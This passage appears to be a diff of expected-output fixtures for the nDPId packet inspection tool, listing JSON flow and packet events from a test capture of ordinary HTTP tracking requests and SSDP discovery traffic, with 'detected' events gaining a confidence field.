8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01289{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"}
-01361{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01387{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="}
 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="}
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="}
 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAAB0AABAAAERw5fAqAU\/7\/\/\/+pnXB2wAYBOHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnNzZHA6YWxsDQpNWDozDQoNCg=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAACXAABAAAERw3TAqAU\/7\/\/\/+u4wB2wAg73KTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVJlbmRlcmVyOjENCk1YOjMNCg0K"}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
